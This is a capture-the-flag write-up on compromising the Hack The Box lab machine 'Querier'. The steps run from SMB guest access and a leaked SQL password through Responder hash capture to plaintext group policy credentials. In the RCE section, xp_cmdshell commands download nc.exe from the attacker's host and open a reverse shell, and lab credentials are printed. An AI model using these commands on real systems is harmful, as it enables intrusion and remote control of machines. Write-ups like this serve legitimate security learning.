Hackthebox: Querier Write-up

Late to the party on posting this write-up, think it was retired 2 weeks ago but this box was a blast and probably only the 2nd one I’ve ever done where I got to use Responder on a CTF. This one is going to be screenshot heavy as a lot of the work was done in a SQL database and required a lot of steps that would be hard to follow along with without.

Recon

135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-26T01:05:06
|_Not valid after:  2049-05-26T01:05:06
|_ssl-date: 2019-05-26T01:14:14+00:00; +9s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC

NMAP scan tells us we’re gonna be dealing with a Windows box, and with SMB enabled that’s usually my first place to look assuming it allows guest connections. This one does allow for it so it’s possible to connect with:

smbclient \\10.10.10.125 -U 'Guest'

When prompted for the password, just press enter and then we can start looking around for anything of value. This machine had a file called ‘vbaProject.bin’ that seemed out of place, and running ‘strings’ against it gives us a database password that’ll be key in pretty much the entirety of the rest of the box.



Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6

Next step involves using part of the Impacket collection, specifically the mssqlclient aspect of it that will allow us to run some of the commands necessary for RCE.

I then looked into a previous write-up on the ‘mantis’ box here to find some of the SQL commands needed in order to get this working.

RCE

Interesting, so we can get the SMB server to communicate with our attacking box, this is the exact sort of situation Responder was created for to potentially get a hash to crack later.

Siiiiick! Got a hash to crack with that, so just have to throw it into hashcat with the rockyou wordlist and find that we’ve now got a valid credential to get onto the box itself with.

Validating we have a valid user
User.txt

The command above failed unfortunately, which made me think that maybe the user we had privileges as did not have permission to write to the Temp folder. The user did have their own set of home directories, however, so found that it was possible to write into the ‘mssql-svc/documents’ folder as that user. Next step just involved getting that nc.exe into the proper folder then sending out a reverse shell to my attacking machine.

That sequence of commands:

python /usr/share/doc/python-impacket/examples/mssqlclient.py -db Volume mssql-svc@10.10.10.125 -windows-auth
corporate568
enable xp_cmdshell

xp_cmdshell "powershell -command (New-Object System.Net.WebClient).DownloadFile(\"http://10.10.14.30:8000/nc.exe\", \"C:\Users\mssql-svc\documents\nc.exe\")"

SQL> xp_cmdshell "C:\users\mssql-svc\documents\nc.exe -nv 10.10.14.30 9995 -e cmd.exe"

PrivEsc to System

I searched around the box with my new privileges but couldn’t find anything that blatantly stood out to me and decided to get PowerUp onto the server which led to a juicy little group policy file:

That password allows us to connect to the SMB share as the administrator which leads us to the root flag! Not really a proper privesc in my book as it’s just plaintext credentials, but you’d really be surprised by how often this happens in the real world.

Really enjoyed this box, I felt it was one of the more real-life applicable ones that I’ve done recently and getting to use Responder on a CTF with only one connected machine was really well done.

gg!